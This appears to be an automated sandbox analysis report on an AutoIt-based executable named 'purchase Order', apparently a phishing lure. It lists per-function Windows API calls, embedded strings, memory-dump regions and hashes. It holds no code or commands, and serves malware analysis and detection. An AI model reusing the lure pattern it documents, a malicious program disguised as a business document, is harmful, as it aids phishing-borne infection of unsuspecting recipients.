LockResource.KERNEL32(00C4449E,?,?,00C4449E,?,?,00000000,00000001,?,?,?,?,?,?,00C441FB,00000000), ref: 00CB4F42

Strings

SCRIPT, xrefs: 00C44088

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: e1e8edac7c489ca8c8872860c45781f9c7c89e91b328e5116216af8a83f5ff5c
Instruction ID: afea661714368e57fba5f87d6704eb423ff6b5920bdde9bbb39401779ce69da5
Opcode Fuzzy Hash: e1e8edac7c489ca8c8872860c45781f9c7c89e91b328e5116216af8a83f5ff5c
Instruction Fuzzy Hash: E1113C71200701BFE7258B66EC49F67BBB9EBC5B51F20417DFA12962A0DB71DD00CA60

Function 00C86CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00CB2F49), ref: 00C86CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00C86CCA
FindClose.KERNEL32(00000000), ref: 00C86CDA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 1a5fee2b72a7b8d8e0e959944b534f311a2710f134d5f9319715f8d4d82b4da4
Instruction ID: e1cae6d01f0b6c30af6c5aeb8982e09cdbfd228234c0c214861200437f1a82bc
Opcode Fuzzy Hash: 1a5fee2b72a7b8d8e0e959944b534f311a2710f134d5f9319715f8d4d82b4da4
Instruction Fuzzy Hash: 4EE048318145155B82107738EC0D9ED776CDB0533DF244715F576C11D0E770DA4446DA

Function 00C53B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00C54176

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: ee05877403f15e62faec70e1c7a616e815fb0657cd3ddec1c4221d74a54431fc
Instruction ID: 5d4ca01ea43435cf7553da03be6aada79322e92f5c6485c2e8af5392b9a809cc
Opcode Fuzzy Hash: ee05877403f15e62faec70e1c7a616e815fb0657cd3ddec1c4221d74a54431fc
Instruction Fuzzy Hash: 4472DF38D042089FCF14DF94C885ABEB7B5FF44341F14815AEC16AB291D770AE89DB95

Function 00C53200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 65d0092cc76e28328c44b845c6cde1a63cc44143a1260a0975a46aa94afaf950
Instruction ID: f61ae4e5c50a89f0a912d9129a6583af2e29117c20627a31ff4c7c4050ba3855
Opcode Fuzzy Hash: 65d0092cc76e28328c44b845c6cde1a63cc44143a1260a0975a46aa94afaf950
Instruction Fuzzy Hash: DD929A746083418FD724DF18C484B6ABBE0FF88344F14885DE99A8B362D771EE89DB56

Function 00C4E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C4E959
timeGetTime.WINMM ref: 00C4EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C4ED2E
TranslateMessage.USER32(?), ref: 00C4ED3F
DispatchMessageW.USER32(?), ref: 00C4ED4A
LockWindowUpdate.USER32(00000000), ref: 00C4ED79
DestroyWindow.USER32 ref: 00C4ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C4ED9F
Sleep.KERNEL32(0000000A), ref: 00CB5270
TranslateMessage.USER32(?), ref: 00CB59F7
DispatchMessageW.USER32(?), ref: 00CB5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB5A19

Strings

@GUI_WINHANDLE, xrefs: 00CB5360
@TRAY_ID, xrefs: 00CB54C9
@GUI_CTRLHANDLE, xrefs: 00CB53AC
@GUI_CTRLID, xrefs: 00CB5314

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 67ebdc4b1f81a2bb31274a04d7104715cc6caf30ce2ec3c65f5d1ca4a7fff656
Instruction ID: 78882e42103415b1ad98103b7cae3f12625604a31f7a04f1371f732d801848cb
Opcode Fuzzy Hash: 67ebdc4b1f81a2bb31274a04d7104715cc6caf30ce2ec3c65f5d1ca4a7fff656
Instruction Fuzzy Hash: BE62A170508340DFEB24DF24C885BAA77E4BF44304F19497DF99A8B292DB71D988DB62

Function 00C75C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00C75EC3
___createFile.LIBCMT ref: 00C75F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C75F2D
__dosmaperr.LIBCMT ref: 00C75F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00C75F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C75F6A
__dosmaperr.LIBCMT ref: 00C75F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C75F7C
__set_osfhnd.LIBCMT ref: 00C75FAC
__lseeki64_nolock.LIBCMT ref: 00C76016
__close_nolock.LIBCMT ref: 00C7603C
__chsize_nolock.LIBCMT ref: 00C7606C
__lseeki64_nolock.LIBCMT ref: 00C7607E
__lseeki64_nolock.LIBCMT ref: 00C76176
__lseeki64_nolock.LIBCMT ref: 00C7618B
__close_nolock.LIBCMT ref: 00C761EB

Part of subcall function 00C6EA9C: CloseHandle.KERNELBASE(00000000,00CEEEF4,00000000,?,00C76041,00CEEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C6EAEC
Part of subcall function 00C6EA9C: GetLastError.KERNEL32(?,00C76041,00CEEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C6EAF6
Part of subcall function 00C6EA9C: __free_osfhnd.LIBCMT ref: 00C6EB03
Part of subcall function 00C6EA9C: __dosmaperr.LIBCMT ref: 00C6EB25

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

__lseeki64_nolock.LIBCMT ref: 00C7620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C76342
___createFile.LIBCMT ref: 00C76361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C7636E
__dosmaperr.LIBCMT ref: 00C76375
__free_osfhnd.LIBCMT ref: 00C76395
__invoke_watson.LIBCMT ref: 00C763C3
__wsopen_helper.LIBCMT ref: 00C763DD

Strings

@, xrefs: 00C75F98

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: c2a041501d9cdb568c3e96e33a40b0b0edf45ea477d028f07e0e301bd12f8422
Instruction ID: e79a5ad0d84fd12fa3d2432cefd27219076222ff7785eca16163a7db0399ca63
Opcode Fuzzy Hash: c2a041501d9cdb568c3e96e33a40b0b0edf45ea477d028f07e0e301bd12f8422
Instruction Fuzzy Hash: BA225771900A069FEF259F68DC85BBD7B71EB14314F28C228E5399B2E2C3758E50DB91

Function 00C8FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 00C8FA96
_wcschr.LIBCMT ref: 00C8FAA4
_wcscpy.LIBCMT ref: 00C8FABB
_wcscat.LIBCMT ref: 00C8FACA
_wcscat.LIBCMT ref: 00C8FAE8
_wcscpy.LIBCMT ref: 00C8FB09
__wsplitpath.LIBCMT ref: 00C8FBE6
_wcscpy.LIBCMT ref: 00C8FC0B
_wcscpy.LIBCMT ref: 00C8FC1D
_wcscpy.LIBCMT ref: 00C8FC32
_wcscat.LIBCMT ref: 00C8FC47
_wcscat.LIBCMT ref: 00C8FC59
_wcscat.LIBCMT ref: 00C8FC6E

Part of subcall function 00C8BFA4: _wcscmp.LIBCMT ref: 00C8C03E
Part of subcall function 00C8BFA4: __wsplitpath.LIBCMT ref: 00C8C083
Part of subcall function 00C8BFA4: _wcscpy.LIBCMT ref: 00C8C096
Part of subcall function 00C8BFA4: _wcscat.LIBCMT ref: 00C8C0A9
Part of subcall function 00C8BFA4: __wsplitpath.LIBCMT ref: 00C8C0CE
Part of subcall function 00C8BFA4: _wcscat.LIBCMT ref: 00C8C0E4
Part of subcall function 00C8BFA4: _wcscat.LIBCMT ref: 00C8C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C8FA61

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 7a994ab682c0d49097016bb4914902a4d32e0d4d6fdae3469d79c681fc498b9b
Instruction ID: f245d0572f19d37e4d5c2361a9febfe1131ed040787e5c56e3ed269f2e42c8cd
Opcode Fuzzy Hash: 7a994ab682c0d49097016bb4914902a4d32e0d4d6fdae3469d79c681fc498b9b
Instruction Fuzzy Hash: D291AF72504205AFCB20EF50C881F9BB3E8BF84314F00496DF999972A2DB30EA45DB96

Function 00C43F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C43F86
RegisterClassExW.USER32(00000030), ref: 00C43FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C43FC1
InitCommonControlsEx.COMCTL32(?), ref: 00C43FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C43FEE
LoadIconW.USER32(000000A9), ref: 00C44004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C44013

Strings

AutoIt v3 GUI, xrefs: 00C43FA2
+, xrefs: 00C43F6F
0, xrefs: 00C43F68
TaskbarCreated, xrefs: 00C43FB6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f545caabb2903377e1c7f6ce3ef651bdc10e72b8e250636b149f2a544ce217bb
Instruction ID: 405f8bcf493733492e6b148d80575bebfaa9b93e93f6ca21f28ad75bac3e81d3
Opcode Fuzzy Hash: f545caabb2903377e1c7f6ce3ef651bdc10e72b8e250636b149f2a544ce217bb
Instruction Fuzzy Hash: 6F2197B9D00319AFDB409FA5EC89BCDBBB4FB08704F00422AF619E62A0D7B545448FA5

Function 00C8BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C8BDB4: __time64.LIBCMT ref: 00C8BDBE

Part of subcall function 00C44517: _fseek.LIBCMT ref: 00C4452F

__wsplitpath.LIBCMT ref: 00C8C083

Part of subcall function 00C61DFC: __wsplitpath_helper.LIBCMT ref: 00C61E3C

_wcscpy.LIBCMT ref: 00C8C096
_wcscat.LIBCMT ref: 00C8C0A9
__wsplitpath.LIBCMT ref: 00C8C0CE
_wcscat.LIBCMT ref: 00C8C0E4
_wcscat.LIBCMT ref: 00C8C0F7
_wcscmp.LIBCMT ref: 00C8C03E

Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C65D
Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C8C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C8C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C8C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8C371

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: bfbec230fec2ea80eb3431d088b20b32f4b5a15455046816ced51662c3949cc7
Instruction ID: a12050512474e2d4afa107cd171027ae8467e53250345d76578ddcdeda7272f9
Opcode Fuzzy Hash: bfbec230fec2ea80eb3431d088b20b32f4b5a15455046816ced51662c3949cc7
Instruction Fuzzy Hash: 97C13AB1900219AFDF25EF95CC81EDEBBBCAF49314F1080AAF609E6151DB309A449F65

Function 00C43742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00C437B3
KillTimer.USER32(?,00000001), ref: 00C437DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C43800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C4380B
CreatePopupMenu.USER32 ref: 00C4381F
PostQuitMessage.USER32(00000000), ref: 00C4382E

Strings

TaskbarCreated, xrefs: 00C43806

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 131a53368e22a6dd4462861a1f9e73a5ca6ba649da4918c800e923fd64f3f49c
Instruction ID: 392fc5c440b37d26f39267a6bb06ee722cd4c9889d0eec634a3d181f54c83c0f
Opcode Fuzzy Hash: 131a53368e22a6dd4462861a1f9e73a5ca6ba649da4918c800e923fd64f3f49c
Instruction Fuzzy Hash: 384104F92042C6ABDB146B68DE4EFBA3695FBC4301F440129FA96D22D1DA609F40D772

Function 00C43E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C43E79
LoadCursorW.USER32(00000000,00007F00), ref: 00C43E88
LoadIconW.USER32(00000063), ref: 00C43E9E
LoadIconW.USER32(000000A4), ref: 00C43EB0
LoadIconW.USER32(000000A2), ref: 00C43EC2

Part of subcall function 00C44024: LoadImageW.USER32(00C40000,00000063,00000001,00000010,00000010,00000000), ref: 00C44048

RegisterClassExW.USER32(?), ref: 00C43F30

Part of subcall function 00C43F53: GetSysColorBrush.USER32(0000000F), ref: 00C43F86
Part of subcall function 00C43F53: RegisterClassExW.USER32(00000030), ref: 00C43FB0
Part of subcall function 00C43F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C43FC1
Part of subcall function 00C43F53: InitCommonControlsEx.COMCTL32(?), ref: 00C43FDE
Part of subcall function 00C43F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C43FEE
Part of subcall function 00C43F53: LoadIconW.USER32(000000A9), ref: 00C44004
Part of subcall function 00C43F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C44013

Strings

AutoIt v3, xrefs: 00C43F1F
0, xrefs: 00C43F02
#, xrefs: 00C43F09

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: fc3104b768e7cb699e6dd852cb9c34b730fb2a99467217f845efe9ead0695131
Instruction ID: b438447a284e105155f301b973d8e238f5dced9cc859b592c87223a7363028b7
Opcode Fuzzy Hash: fc3104b768e7cb699e6dd852cb9c34b730fb2a99467217f845efe9ead0695131
Instruction Fuzzy Hash: 2621FAB4D00344ABDB04DFA9EC49B9DBBF5FB48310F10812AE619E73A0D77556449BA2

Function 00C6ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00C6ACC1

Part of subcall function 00C67CF4: __mtinitlocknum.LIBCMT ref: 00C67D06
Part of subcall function 00C67CF4: EnterCriticalSection.KERNEL32(00000000,?,00C67ADD,0000000D), ref: 00C67D1F

__calloc_crt.LIBCMT ref: 00C6ACD2

Part of subcall function 00C66986: __calloc_impl.LIBCMT ref: 00C66995
Part of subcall function 00C66986: Sleep.KERNEL32(00000000,000003BC,00C5F507,?,0000000E), ref: 00C669AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 00C6ACED
GetStartupInfoW.KERNEL32(?,00CF6E28,00000064,00C65E91,00CF6C70,00000014), ref: 00C6AD46
__calloc_crt.LIBCMT ref: 00C6AD91
GetFileType.KERNEL32(00000001), ref: 00C6ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00C6AE11

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: a299a0e0d7196acc4ea7825c14c1feb019095d4ce2579a8c8b0b82d922f56e26
Instruction ID: 9dcc295fb5bf8d405aa8603335c06ac955aed849425e741f7c3f6bce21bd9fb8
Opcode Fuzzy Hash: a299a0e0d7196acc4ea7825c14c1feb019095d4ce2579a8c8b0b82d922f56e26
Instruction Fuzzy Hash: E181B1719053458FDB24CFA8C8806ADBBF0AF09324B28426DD4AAFB3D1D7359902CF56

Function 00C436B8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,ICTRLCREATETREEVIEW,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C436E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43707
ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C4371B
ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C43724

Strings

AutoIt v3, xrefs: 00C436DE, 00C436E3, 00C436E4
ICTRLCREATETREEVIEW, xrefs: 00C436D9
edit, xrefs: 00C43701

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$ICTRLCREATETREEVIEW$edit
API String ID: 1584632944-1087800450
Opcode ID: 3388a13e509ed7c5842e3102f1c191ce404a3b9d8ad0ac2d0ae52ce41e091023
Instruction ID: 40346984ac995de0eeab110df0da5436eb1256f5065fbc134c8e621e05fde240
Opcode Fuzzy Hash: 3388a13e509ed7c5842e3102f1c191ce404a3b9d8ad0ac2d0ae52ce41e091023
Instruction Fuzzy Hash: 6FF0DA799403D07AE7315757AC48F772EBDE7C6F60B01802FFA4DE62A0C5611895DAB0

Function 017CD438 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017CD509
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017CD72F

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
